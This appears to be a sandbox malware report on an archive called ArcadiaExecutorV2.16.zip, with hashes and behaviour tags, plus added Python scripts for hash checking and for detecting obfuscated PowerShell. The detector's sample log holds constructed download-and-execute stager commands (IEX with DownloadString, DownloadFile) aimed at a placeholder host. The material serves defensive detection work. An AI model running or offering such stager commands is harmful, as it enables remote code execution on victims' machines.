General

  • Target

    ArcadiaExecutorV2.16.zip

  • Size

    24.3MB

  • Sample

    250208-gz328aznax

  • MD5

    8847dcc1b069b580fc0fdee388369207

  • SHA1

    18406d7dabf3ab2a799d05afe5b984d75d22e920

  • SHA256

    989cf739672494aea2a6a64f8639f23c8ca7708cf6f7efae29baa545cf4375b0

  • SHA512

    2258364b3b2752c2c1400c5f30b31de223d10b5edb8c50fee523bba5906cb6cd56900dffe533df724285f52ef861e656d9451e6745578f9fb0db198af11c38cc

  • SSDEEP

    786432:zr51UrODy9A2tELumTzdA3I2nkJJXXH37rNiBh/S:X51UuktES8zdcn4JHX7rNiX/S

Targets

    • Target

      ArcadiaExecutorV2.16.zip

    • Size

      24.3MB

    • MD5

      8847dcc1b069b580fc0fdee388369207

    • SHA1

      18406d7dabf3ab2a799d05afe5b984d75d22e920

    • SHA256

      989cf739672494aea2a6a64f8639f23c8ca7708cf6f7efae29baa545cf4375b0

    • SHA512

      2258364b3b2752c2c1400c5f30b31de223d10b5edb8c50fee523bba5906cb6cd56900dffe533df724285f52ef861e656d9451e6745578f9fb0db198af11c38cc

    • SSDEEP

      786432:zr51UrODy9A2tELumTzdA3I2nkJJXXH37rNiBh/S:X51UuktES8zdcn4JHX7rNiX/S

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/ArcadiaModule.dll

    • Size

      1.3MB

    • MD5

      7ba33b5fbfd4662d72b50bb09bde7ed7

    • SHA1

      d26998c60811161ec2130d8566029bf0648fa990

    • SHA256

      ec1e6529a83db97684474c1cb4e0a989eb7bcfea98591afc2c026b08f48600a0

    • SHA512

      4626bf8721675e0b0063df5e677b06616db08cdb71f5026263167179dee32faf2a87881e8031a1359ed828ff9e090c1ee29829bb43f3cd043c2b19071aa7c316

    • SSDEEP

      24576:x8Op+ZPe0AI/Ip+Tof6nHuFPZ7sYgdlTa/7oW/dGy/KmlQ82VHP3JYgprP5//pAV:x1p+ZPe0AI/Ip+Tof6nHuFPZ7sYgdlTd

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/ArcadiaUI.exe

    • Size

      51.2MB

    • MD5

      5b9ba4ee7343aaaa7cd1d07c65b36c67

    • SHA1

      4563992458d1addf52aaf1b80f143834b4d3f4c6

    • SHA256

      f443cd3d5e00ca7db2000c383d0361a39f63c106965f7a4fe6498ba69b9de25a

    • SHA512

      43a8fec1d78600d5e4da4745ccda5bd551a75b610c2eb08209c96a6c99a80c0a877807fabdda09c6b17379011cff946487028e3f2613f5d42819ac8e87f2112e

    • SSDEEP

      393216:3t4stWJi9Ui9MA8VFJs+SBZ0RJ2DJ/MxDA6RBgPOdF3aYAubKnvJoKlQnAliXUxg:3trtWJi9Ui9MA8VFoBZ0RMUNtKxwi99Q

    • Downloads MZ/PE file

    • Executes dropped EXE

    • Loads dropped DLL

    • Legitimate hosting services abused for malware hosting/C2

    • Obfuscated Files or Information: Command Obfuscation (ATT&CK T1027.010)

      Adversaries may obfuscate content during command execution to impede detection.

    • Command and Scripting Interpreter: PowerShell (ATT&CK T1059.001)

      The sample invokes powershell.exe.

    • Target

      ArcadiaFolder/Vulkan-1.dll

    • Size

      876KB

    • MD5

      6d6a1f28978d42ad2f0a8f278eaac966

    • SHA1

      b09168ec88109422ca29cf4f1b6462d51930873d

    • SHA256

      fb23fa4fca8f28bebe7b7e39593a211cd3c3405de5f948ec520e859b1bcaf91e

    • SHA512

      76ddf88255a9355fc3c781880e23d94206acca4decf5623712411f7a733e91ca9ea37944860401cf9667f10e8c33a087803a4726f91faff1f23e3e0592ddf41d

    • SSDEEP

      12288:bXlW6JhG2lO8FbG5byJR//uXShuqO3daKScHj/mTnGS:bE6JY2sYS5GJRuHkcHqTnGS

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/d3compiler.dll

    • Size

      492KB

    • MD5

      5e02ddaf3b02e43e532fc6a52b04d14b

    • SHA1

      67f0bd5cfa3824860626b6b3fff37dc89e305cec

    • SHA256

      78bedd9fce877a71a8d8ff9a813662d8248361e46705c4ef7afc61d440ff2eeb

    • SHA512

      38720cacbb169dfc448deef86af973eafefa19eaeb48c55c58091c9d6a8b12a1f90148c287faaaa01326ec47143969ad1b54ee2b81018e1de0b83350dc418d1c

    • SSDEEP

      12288:axrplPT3qwNBC3wl1zVh0Yg0pJy/qleTpfZLQ0so/VHjh:a1plPGwNBC3UOwVeLQ0so/VH

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/directory.cpp

    • Size

      681B

    • MD5

      6340241283dc43e2cd4f941c6ecb58c5

    • SHA1

      989ca161b8e13f3ca2c5bdab49b399fe9b3805a6

    • SHA256

      ba2635c702e94b5fc489d4fc6f0cdeb72decc8545e7fc3e9654f1e64004e5cc4

    • SHA512

      f996ad25f455a57ece913be0cf37f40b2530c00b12c1bbfdb250e1731372d08f27b94d2692f1195e529f420add42b46e82d19eab77d3bc963531b5eb72f89dc9

    Score
    3/10
    • Target

      ArcadiaFolder/libEGL.dll

    • Size

      771KB

    • MD5

      fa842ffa299c794e57597aae857d9cb3

    • SHA1

      154afdfd9bd80c1b512f516a8c187c6dd849161e

    • SHA256

      b1d4cdc7891d51636c5e82a91b9bf20e6bb6e68ddf515ac6f51fbda7b199d07d

    • SHA512

      04ee2bff2a9ff0cf89150bb73f0f6a0bda372a245f12c5772b7167821f54f3d1d43292e3ce3c9f2eca2202688c179d5f09248c0fe522bf028c221e07b2d34e4a

    • SSDEEP

      12288:p19qiYOqG2pYOhcX6j1J5uKxXsE2sMCna5hvD52fcH6p:v9qib2FjxussE2hCyScH6p

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/main.cpp

    • Size

      1KB

    • MD5

      767c8b02d63f83e7e31a4b7a27f40405

    • SHA1

      82de700102b79ad782ad6e64353eb64704a54ad4

    • SHA256

      43f1c36b2cd6d5566b41dd1f97359bc7a0d17c769bd8ebdd0370ca03755b04ed

    • SHA512

      303186c4cc8a1c28779dc9738c43144ba6055aec0bf3d0544402a04c04f18a9830b6f04e774d84c8cd6e0643d45d30b19e87770bd2ed273be324bfef8aeaf22b

    Score
    8/10
    • Downloads MZ/PE file

    • Target

      ArcadiaFolder/vk_swiftshader.dll

    • Size

      952KB

    • MD5

      8836edb783ce89ca6481c297772325bc

    • SHA1

      6968c977f594930543ec296ad00322e998129a6a

    • SHA256

      cfa1993c3e7272b3aee610634592c26beaf8e573ac9d3c59695e35a5d2372b17

    • SHA512

      34f07f52e43296e0b3e084857270a8375faf50e2b6cd9522a572efb90de38a3f27b9727861e0258149ed13bd96e114175c9d1d237b0ef97ad4fa53e119ce7f36

    • SSDEEP

      12288:ZjeSIgE+K5HzlwsHTQwEKaAn9BRWTCbsIgbEpzre+TZjGAfR4J:Zjvs+K5HTJaAn9Bw+rgopWa/uJ

    Score
    1/10
    • Target

      ArcadiaFolder/vk_swiftshader_icd.json

    • Size

      977B

    • MD5

      644dfd86b641a7289f560f128e12798f

    • SHA1

      250e9a4b428aa7dd5fe753b815230c78704d0853

    • SHA256

      9cc489a1f2b80cdc9d748230cf905a8025a17cbade077ee42ed81fc1f874aac2

    • SHA512

      735da46d0f3d33d0e5f55c6fb671d45d845a538cff498ca04e3ae86f8412d06ee6a3d3f5d2774d8d9eb06ddd854f479b7a29ea272c589164f11cd107f141b1b8

    Score
    8/10
    • Downloads MZ/PE file
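
A practical use of the hash inventory above is to confirm that a copy of the archive on disk is the same sample this report describes before trusting any of the per-file findings. The script below is an added example and not the sandbox's own tooling: the SHA256 values are copied from the Targets list, while the zip-walking logic, the function names and the demo archive are mine. The demo archive is a constructed placeholder (the sample's real bytes are not on the page), so its members show up as mismatches; point the script at the real file to get real answers.

```python
"""Check a copy of ArcadiaExecutorV2.16.zip against the hashes in this report.

Added example, not the sandbox's own tooling. The SHA256 values below are
copied from the report; the zip-walking and comparison logic is mine.
Usage: python check_arcadia.py ArcadiaExecutorV2.16.zip
"""
import hashlib
import io
import sys
import zipfile

# Container hash as reported (SHA256 of the .zip itself).
ARCHIVE_SHA256 = "989cf739672494aea2a6a64f8639f23c8ca7708cf6f7efae29baa545cf4375b0"

# Per-member SHA256 as reported, keyed by the archive path.
REPORTED_SHA256 = {
    "ArcadiaFolder/ArcadiaModule.dll": "ec1e6529a83db97684474c1cb4e0a989eb7bcfea98591afc2c026b08f48600a0",
    "ArcadiaFolder/ArcadiaUI.exe": "f443cd3d5e00ca7db2000c383d0361a39f63c106965f7a4fe6498ba69b9de25a",
    "ArcadiaFolder/Vulkan-1.dll": "fb23fa4fca8f28bebe7b7e39593a211cd3c3405de5f948ec520e859b1bcaf91e",
    "ArcadiaFolder/d3compiler.dll": "78bedd9fce877a71a8d8ff9a813662d8248361e46705c4ef7afc61d440ff2eeb",
    "ArcadiaFolder/directory.cpp": "ba2635c702e94b5fc489d4fc6f0cdeb72decc8545e7fc3e9654f1e64004e5cc4",
    "ArcadiaFolder/libEGL.dll": "b1d4cdc7891d51636c5e82a91b9bf20e6bb6e68ddf515ac6f51fbda7b199d07d",
    "ArcadiaFolder/main.cpp": "43f1c36b2cd6d5566b41dd1f97359bc7a0d17c769bd8ebdd0370ca03755b04ed",
    "ArcadiaFolder/vk_swiftshader.dll": "cfa1993c3e7272b3aee610634592c26beaf8e573ac9d3c59695e35a5d2372b17",
    "ArcadiaFolder/vk_swiftshader_icd.json": "9cc489a1f2b80cdc9d748230cf905a8025a17cbade077ee42ed81fc1f874aac2",
}


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_archive(zip_bytes: bytes, table=REPORTED_SHA256, archive_sha256=ARCHIVE_SHA256) -> dict:
    """Compare the container and every file member against the reported hashes.

    Member status is 'match', 'mismatch' (listed path, different bytes) or
    'unlisted' (path the report does not mention); 'missing' lists reported
    paths absent from the archive. The container hash is checked first: a
    re-zipped copy can hold identical members and still have a different
    archive hash, which matters when you cite the sample ID.
    """
    report = {"archive_match": sha256_hex(zip_bytes) == archive_sha256, "members": {}, "missing": []}
    seen = set()
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            name = info.filename.replace("\\", "/")  # normalise Windows-built archives
            seen.add(name)
            expected = table.get(name)
            if expected is None:
                status = "unlisted"
            elif sha256_hex(zf.read(info)) == expected:
                status = "match"
            else:
                status = "mismatch"
            report["members"][name] = status
    report["missing"] = sorted(set(table) - seen)
    return report


def build_demo_zip() -> bytes:
    """Constructed stand-in for the sample (its real bytes are not on the page):
    one member with a reported path and one the report does not list."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("ArcadiaFolder/main.cpp", "int main() { return 0; }\n")
        zf.writestr("ArcadiaFolder/README.txt", "placeholder, not in the report\n")
    return buf.getvalue()


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_demo_zip()
    result = check_archive(data)
    print("archive SHA256 matches report:", result["archive_match"])
    for path, status in sorted(result["members"].items()):
        print(f"  {status:9} {path}")
    for path in result["missing"]:
        print(f"  missing   {path}")
```

Only exact SHA256 equality is checked here. The SSDEEP values in the report are fuzzy hashes meant for near-match comparison of recompiled or repacked variants; comparing those needs the ssdeep tool or a binding for it, and a high similarity score is a lead, not a confirmation.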

MITRE ATT&CK Enterprise v15
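
The two techniques the report attaches to ArcadiaFolder/ArcadiaUI.exe, Command and Scripting Interpreter: PowerShell (T1059.001) and Obfuscated Files or Information: Command Obfuscation (T1027.010), are the ones a detection engineer would turn into a hunt over process-creation logs. The report does not print the obfuscated command line, so what follows is an added, generic example rather than the sandbox's signature: it decodes -EncodedCommand arguments, removes the backtick and caret escapes that PowerShell and cmd.exe strip before execution, and scores what is left. The four log lines are constructed, and the host example.invalid and the file names in them are placeholders, not indicators from the report.

```python
"""Flag obfuscated powershell.exe command lines in process-creation logs.

Added example, not part of the sandbox report: the report records that
ArcadiaUI.exe launches powershell.exe with an obfuscated command but does
not show that command, so the log lines below are constructed and the
heuristics are generic ones, not the sandbox's own signatures.
"""
import base64
import binascii
import re

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc, ...)
# followed by a base64 token. Short values such as "-ExecutionPolicy Bypass"
# never reach the length floor, so they do not trip the decoder.
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/]{16,}={0,2})")

# Letters split by a backtick (PowerShell escape) or caret (cmd.exe escape):
# I`E`X and p^o^w^e^r^s^h^e^l^l are the classic forms.
ESCAPE_IN_TOKEN = re.compile(r"[A-Za-z][`^][A-Za-z]")

# (name, weight, pattern) applied to the de-escaped, decoded text.
PATTERNS = [
    ("hidden_window", 1, re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")),
    ("no_profile", 1, re.compile(r"(?i)-no(?:p|profile|ni|ninteractive)\b")),
    ("invoke_expression", 2, re.compile(r"(?i)\biex\b|invoke-expression")),
    ("download_primitive", 2, re.compile(
        r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer")),
    ("base64_in_script", 1, re.compile(r"(?i)frombase64string")),
    ("string_concat", 2, re.compile(r"'[^']{1,10}'\s*\+\s*'")),  # 'Down'+'loadFile'
    ("char_cast", 2, re.compile(r"(?i)\[char\]\s*\d+")),
]
SUSPICIOUS_AT = 4  # threshold chosen for this example, tune against your own baseline


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script carried by an encoded-command argument, else None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(cmdline: str) -> dict:
    """Score one command line; returns the indicators hit and any decoded payload."""
    hits, score = [], 0
    decoded = decode_encoded_command(cmdline)
    text = cmdline
    if decoded is not None:
        hits.append("encoded_command")
        score += 2
        text = cmdline + " " + decoded  # scan the wrapper flags and the payload
    if ESCAPE_IN_TOKEN.search(text):
        hits.append("escape_in_token")
        score += 2
    # Match what the interpreter sees: PowerShell drops backticks and cmd.exe
    # drops carets before the command runs, so the logged form hides the verbs.
    plain = text.replace("`", "").replace("^", "")
    for name, weight, pattern in PATTERNS:
        if pattern.search(plain):
            hits.append(name)
            score += weight
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits,
            "score": score, "suspicious": score >= SUSPICIOUS_AT}


def scan(lines):
    return [analyze(line) for line in lines]


def encode_command(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample: one benign admin invocation and three obfuscated stagers.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.ps1')"
SAMPLE_LOG = [
    r"powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1",
    "powershell.exe -nop -w hidden -enc " + encode_command(STAGER),
    r"""powershell.exe -w hidden -c "I`E`X (New-Object Net.WebClient).DownloadString('https://example.invalid/stage.ps1')" """,
    r"""cmd.exe /c powershell -c "$m='Down'+'loadFile'; (New-Object Net.WebClient).$m('https://example.invalid/m.dll', $env:TEMP+'\m.dll')" """,
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        flag = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{flag:10} score={r['score']} {r['indicators']}")
        if r["decoded"]:
            print("           decoded:", r["decoded"])
```

The fourth sample line is the instructive one: because the method name is assembled from 'Down'+'loadFile' at run time, a plain substring match on DownloadFile never fires, and the line is caught only by the concatenation pattern plus the Net.WebClient reference. Decoding the encoded form before matching, and de-escaping before matching, is what keeps the other two from slipping past the same rules.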

Tasks